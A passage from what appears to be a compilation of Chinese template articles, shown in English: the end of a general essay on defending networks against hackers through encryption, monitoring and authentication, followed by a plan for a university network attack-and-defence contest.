Protection against hacker attacks must be applicable and targeted to the actual situation; the author proposes several measures. First, cryptographic technology. Among the protective measures against hacker attacks, cryptography is key; to implement encryption, the medium in the middle is the key, of which there are public keys and private keys. A private key means a symmetric cipher; a public key means an asymmetric cipher. Strengthening cryptographic technology in computer network systems encrypts the computer's communication data, which prevents hacker eavesdropping and attacks and effectively ensures the security and reliability of data [3]. RSA is currently in wide use. Second, security monitoring technology. This is important: by monitoring network and host activity in real time and watching the state and behaviour of users and the system, configuration problems and vulnerabilities can be found promptly, data and system integrity can be assessed promptly, attack behaviour can be identified effectively, and abnormal behaviour can be counted and tracked, ensuring the safe use of the system network. Third, identity authentication technology. Using identity authentication technology also works well; it confirms the operator's identity [4]. Information in a computer network is represented by specific sets of data; the computer recognises the user's digital identity and authorises the user, that is, authorises the digital identity. Identity authentication ensures that the operator's physical and digital identities correspond; it is the first gate of network resource protection and plays a positive role in securing network applications.
III. Conclusion
In summary, strengthening the scientific application of protection technology against hacker attacks on computer networks requires considering many aspects so that the technology's effect is fully realised. Through this study of the forms of hacker attacks on computer networks and the protective measures proposed, the author hopes to help solve real network security problems.
References
[1] Chen Wan, Wang Shuxia, Zhu Sizhi, Sun Huansheng, Wu Jiang. A brief discussion of attack and defence strategies for hacker intrusions into websites [J]. Computer Knowledge and Technology. (20)
[2] Wang Pingxia. Network hackers, don't even think of coming near me [J]. Computer Applications Digest. (09)
[3] Liang Bin. Techniques and methods commonly used by hackers to attack websites [J]. China High-Tech Enterprises. 2016(08)
[4] Lu Fengjun. Research on the ethical problems of network hackers [J]. Scientific Consult (Science and Technology Management). 2016(07)
Article 9: Campus IT Culture Festival Network Attack and Defence Contest Event Plan
I. Event theme:
Network attack and defence contest
II. Event introduction:
This golden autumn, registration is open for the campus IT culture festival's "Network Attack and Defence Contest"! The contest brings together students who are interested in and confident about network attack and defence technology, and puts them through a series of written tests, practical battles and plan-design challenges. If you have a dream, form a team and sign up, show your strength in the competition, demonstrate the power of knowledge and realise your dreams! Don't wait, register now! Let us get one step closer to our dreams, go out and make our mark, and leave a historic page in network attack and defence at Neusoft.
III. Organiser:
Business and Trade Association, Nanhai Campus, South China Normal University
IV. Eligible participants:
Current students of South China Normal University
V. Contest rules:
An attack-and-defence battle on servers, with the servers provided by the organiser.
VI. Competition format:
Preliminary round: a written test on computer network security knowledge. Semi-final and final rounds: hands-on operation.
VII. Event time:
Registration 1 November xx to 9 November xx; contest 10 November xx to 20 November xx
VIII. Prizes:
(1) First prize, one team: XX yuan (certificate, gift per person, 200-yuan training voucher per person)
(2) Second prize, two teams: 800 yuan (certificate, 200-yuan training voucher per person)
(3) Third prize, three teams: 400 yuan (certificate, 200-yuan training voucher per person)
(4) Merit award, six teams: 50 yuan (certificate + prize)
IX. Registration:
Registration is by team, with 1 to 5 members per team and no restriction on department, major or undergraduate/associate level.
Time: from today until 9 November xx
Electronic registration: collect a registration form from Room 303 of the Student Activity Centre, Monday to Friday 12:30 to 13:30, and hand it in to the Student Society Office, Room 303 of the Student Activity Centre, during duty hours before 9 November. Forms are also available between buildings A and B of Neusoft Institute Nanhai.